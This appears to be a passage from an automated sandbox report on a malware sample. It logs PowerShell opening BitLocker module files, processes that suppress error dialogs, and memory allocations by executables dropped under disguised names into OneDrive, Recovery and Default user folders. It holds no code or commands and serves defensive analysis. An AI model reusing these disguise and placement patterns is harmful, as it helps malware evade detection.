                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries collapsed)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process information set: NOOPENFILEERRORBOX (51 identical entries collapsed)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries collapsed)
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Process information set: NOOPENFILEERRORBOX (62 identical entries collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (24 identical entries collapsed)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Memory allocated: 2770000 memory reserve | memory write watch
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Memory allocated: 1A8F0000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Memory allocated: BB0000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Memory allocated: 1A7E0000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Memory allocated: 2360000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Memory allocated: 1A4E0000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Memory allocated: 2E20000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Memory allocated: 1B0D0000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Memory allocated: 1720000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Memory allocated: 1B530000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exe | Memory allocated: 14F0000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exe | Memory allocated: 1AF80000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exe | Memory allocated: 2870000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exe | Memory allocated: 1AA60000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Memory allocated: 1380000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Memory allocated: 1AD10000 memory reserve | memory write watch
